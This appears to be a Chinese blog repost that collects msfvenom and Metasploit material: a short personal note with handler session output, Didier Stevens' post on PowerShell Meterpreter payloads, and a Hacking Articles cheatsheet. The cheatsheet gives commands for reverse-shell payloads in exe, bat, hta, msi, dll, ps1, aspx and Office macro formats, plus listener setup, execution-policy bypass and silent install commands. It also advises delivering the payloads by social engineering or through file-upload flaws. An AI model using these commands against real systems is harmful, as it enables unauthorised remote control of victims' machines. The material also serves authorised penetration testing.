metasploit MSFVenom 生成powershell paylod todo 无文件攻击 msiexec /quiet /qn /i shell.msi



msfvenom -p windows/x64/meterpreter_reverse_http -f psh -o m64.ps1 LHOST=<br><br>msfconsole里:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_http
payload => windows/x64/meterpreter_reverse_http
msf6 exploit(multi/handler) > set lhost
lhost =>
msf6 exploit(multi/handler) > exploit
[*] Started HTTP reverse handler on
[!] handling request from; (UUID: lmlpxkt7) Without a database connected that payload UUID tracking will not work!
[*] handling request from; (UUID: lmlpxkt7) Redirecting stageless connection from /5rMMt7IriBVkx2XFBrJyuAqt7PfOx9So1n4Jb6M7alIC-UAZ-At7iprx1gUhIiSCrgQz4CpvwuUHWx96HoMXJ67Uq7SZMmfSrm-p2EPPzJ9Dn3zVIbtqpc_Bv34 with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[!] handling request from; (UUID: lmlpxkt7) Without a database connected that payload UUID tracking will not work!
[*] handling request from; (UUID: lmlpxkt7) Attaching orphaned/stageless session...
[!] handling request from; (UUID: lmlpxkt7) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened ( -> ) at 2022-05-06 08:37:20 -0400
meterpreter >
meterpreter > shell
Process 5932 created.
Channel 1 created.
Microsoft Windows [�汾 10.0.19044.1645]
(c) Microsoft Corporation����������Ȩ����



powershell -NoExit -ExecutionPolicy Bypass -File m64.ps1




Generating PowerShell Scripts With MSFVenom On Windows

Filed under: Hacking — Didier Stevens @ 20:46

To generate a PowerShell script with msfvenom on Windows, use the command “msfvenom.bat –payload windows/x64/meterpreter_reverse_http –format psh –out meterpreter-64.ps1 LHOST=”:

The payload windows/x64/meterpreter_reverse_http is the Meterpreter payload for 64-bit Windows. Format psh is the format to use to generate a PowerShell script that will execute the payload (formats ps1 and powershell are transform formats, they do not generate a script that executes the payload).

A 32-bit payload is generated with this command “msfvenom.bat –payload windows/meterpreter_reverse_http –format psh –out meterpreter-32.ps1 LHOST=”:

Just as I showed in my post for .exe payloads, we start a handler like this:

Now we need to execute the PowerShell scripts. Just executing “powershell.exe -File meterpreter-64.ps1” will not work:

By default, .ps1 files are not executed. We can execute them by bypassing the policy “powershell.exe -ExecutionPolicy Bypass -File meterpreter-64.ps1”:

In this example, 948 is the handle to the thread created by CreateThread when the payload is executed.

But back in the Metasploit console, you will not see a connection. That’s because the PowerShell process terminates before the Meterpreter payload can fully execute: powershell.exe executes the script, which loads the Meterpreter payload in the powershell process, and then powershell.exe exits, e.g. the powershell process is terminated and thus the Meterpreter payload too.

To give the Meterpreter payload the time to establish a connection, the powershell process must remain alive. We can do this by preventing powershell.exe to exit with option -NoExit:

Now we get a connection:

This example was for a 64-bit payload on a 64-bit Windows machine.

The same command is used to execute the 32-bit payload on a 32-bit Windows machine (except for the filename, which is meterpreter-32.ps1 in our example).

To execute the 32-bit payload on a 64-bit Windows machine, we need to start 32-bit PowerShell, like this “c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoExit -File meterpreter-32.ps1”:

This gives us 2 sessions:



Msfvenom Cheatsheet: Windows Exploitation

In this post, you will learn how to use MsfVenom to generate all types of payloads for exploiting the windows platform. Read beginner guide from here

Table of Content

  • Requirements
  • MsfVenom Syntax
  • Payload and its types
  • Executable Payload (exe)
  • Powershell Batch File
  • HTML Application Payload (HTA)
  • Microsoft Installer Payload (MSI)
  • Dynamic-link library Payload (DLL)
  • Powershell Payload (psh-cmd)
  • Powershell Payload (ps1)
  • Web shell Payload (ASPX)
  • Visual Basic Payload (.vba)


  • Kali Linux
  • Windows Machine

MsfVenom Syntax

MsfVenom is a Metasploit standalone payload generator which is also a replacement for msfpayload and msfencode.

Payload and its types

Payload, are malicious scripts that an attacker use to interact with a target machine in order to compromise it. Msfvenom supports the following platform and format to generate the payload. The output format could be in the form of executable files such as exe,php,dll or as a one-liner.

Two major types of Payloads  

Stager: They are commonly identified by second (/) such as windows/meterpreter/reverse_tcp

Stageless: The use of _ instead of the second / in the payload name such as windows/meterpreter_reverse_tcp

As we have mentioned above, this post may help you to learn all possible methods to generate various payload formats for exploiting the Windows Platform.

Executable Payload (exe)

Payload Type: Stager

Executing the following command to create a malicious exe file is a common filename extension denoting an executable file for Microsoft Windows.

msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f exe > shell.exe

Entire malicious code will be written inside the shell.exe file and will be executed as an exe program on the target machine.

Share this file using social engineering tactics and wait for target execution. Meanwhile, launch netcat as a listener for capturing reverse connection.

nc –lvp 443

Powershell Batch File

Payload Type: Stager

Execute the following command to create a malicious batch file, the filename extension .bat is used in DOS and Windows.

msfvenom -p cmd/windows/reverse_powershell lhost= lport=443 > shell.bat

Entire malicious code will be written inside the shell.bat file and will be executed as .bat script on the target machine.

Share this file using social engineering tactics and wait for target execution. Meanwhile, launch netcat as the listener for capturing reverse connection.

nc –lvp 443

HTML Application Payload (HTA)

Payload Type: Stager

An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript

Execute the following command to create a malicious HTA file, the filename extension .hta is used in DOS and Windows.

msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f hta-psh > shell.hta

Entire malicious code will be written inside the shell.hta file and will be executed as .hta script on the target machine. Use Python HTTP Server for file sharing.


An HTA is executed using the program mshta.exe or double-clicking on the file

This will bring reverse connection through netcat listener which was running in the background for capturing reverse connection.

nc –lvp 443

Microsoft Installer Payload (MSI)

Windows Installer is also known as Microsoft Installer. An MSI file is a Windows package that provides installation information for a certain installer, such as the programs that need to be installed. It can be used to install Windows updates or third-party software same like exe.

Execute the following command to create a malicious MSI file, the filename extension .msi is used in DOS and Windows. Transfer the malicious on the target system and execute it.

msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f msi > shell.msi

Use the command msiexec to run the MSI file.

msiexec /quiet /qn /i shell.msi

This will bring reverse connection through netcat listener which was running in the background for capturing reverse connection.

Dynamic-link library Payload (DLL)

Payload Type: Stager

A DLL is a library that contains code and data that can be used by more than one program.

Execute the following command to create a malicious dll file, the filename extension .dll is used in DOS and Windows. Transfer the malicious on the target system and execute it.

msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f dll > shell.dll

Use the command rundll32 to run the MSI file.

rundll32.exe shell.dll,0

This will bring reverse connection through netcat listener which was running in the background for capturing reverse connection.

Powershell Payload (psh-cmd)

Payload Type: Stager

Format – psh, psh-net, psh-reflection, or psh-cmd

The generated payload for psh, psh-net, and psh-reflection formats have a .ps1 extension, and the generated payload for the psh-cmd format has a .cmd extension Else you can directly execute the raw code inside the Command Prompt of the target system.

msfvenom -p cmd/windows/reverse_powershell lhost= lport=443 -f psh-cmd > -f raw

Execute the following command to generate raw code for the malicious PowerShell program.

For execution, copy the generated code and paste it into the Windows command prompt

This will bring reverse connection through netcat listener which was running in the background for capturing reverse connection.

Powershell Payload (ps1)

Payload Type: Stager

A PS1 file is a script, or “cmdlet,” used by Windows PowerShell. PS1 files are similar to .BAT and.CMD files, except that they are executed in Windows PowerShell instead of the Windows Command Prompt

Execute the following command to create a malicious PS1 script, the filename extension.PS1 is used in Windows PowerShell

msfvenom -p windows/x64/meterpreter_reverse_https lhost= lport=443 -f psh > shell.ps1

Since the reverse shell type is meterpreter thus we need to launch exploit/multi/handler inside Metasploit framework.

PowerShell’s execution policy is a safety feature that controls the conditions under which PowerShell loads configuration files and runs scripts. This feature helps prevent the execution of malicious scripts. Prevents running of all script files, including formatting and configuration files (.ps1xml), module script files (.psm1), and PowerShell profiles (.ps1).

Read more from here

In order to execute the PS1 script, you need to bypass the execution policy by running the following command in the Windows PowerShell and executing the script.

PowerShell –ep bypass

use exploit/multi/handler
set lhost
set lport 443
set payload windows/x64/meterpreter_reverse_https

As soon as the target will execute the shell.ps1 script, an attacker will get a reverse connection through meterepreter session.

Web shell Payload (ASPX)

Payload Type: Stageless

An ASPX file is an Active Server Page Extended file for Microsoft’s ASP.NET platform. When the URL is viewed, these pages are shown in the user’s web browser, .NET web forms are another name for them.

Execute the following command to create a malicious aspx script, the filename extension .aspx.

msfvenom -p windows/x64/meterpreter/reverse_https lhost= lport=443 -f aspx > shell.aspx

Since the reverse shell type is meterpreter thus we need to launch exploit/multi/handler inside metasploit framework.

You can inject this payload for exploiting Unrestricted File Upload vulnerability if the target is IIS Web Server.

Execute the upload script in the web browser.

use exploit/multi/handler
set lhost
set lport 443
set payload windows/x64/meterpreter_reverse_https

As soon as the attacker execute the malicious script, he will get a reverse connection through meterepreter session.

Visual Basic Payload (.vba)

Payload Type: Stageless

VBA is a file extension commonly associated with Visual Basic which supports Microsoft applications such as Microsoft Excel, Office, PowerPoint, Word, and Publisher. It is used to create “macros.” that runs within Excel. An attacker takes the privilege of these features and creates a malicious VB script to be executed as a macros program with Microsoft excel.

Execute the following command to create a malicious aspx script, the filename extension .aspx that will be executed as macros within Microsoft excel.

Read more from here: Multiple Ways to Exploit Windows Systems using Macros

msfvenom -p windows/x64/meterpreter/reverse_https lhost= lport=443 -f vba

Now we open our Workbook that has the malicious macros injected in it. A comprehensive method of macros execution is explained in our previous post.

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost
set lport 1234

As soon as the attacker execute the malicious script, he will get a reverse connection through meterepreter session.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

posted @   bonelee  阅读(739)  评论(0编辑  收藏  举报
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· DeepSeek 开源周回顾「GitHub 热点速览」
2021-05-06 通过超级ping判断一个站点是否有cdn 并且找到源站IP 当然自己使用vpn国外代理直接访问也可以
2021-05-06 Red Team 又玩新套路,竟然这样隐藏 C2——类似后渗透代理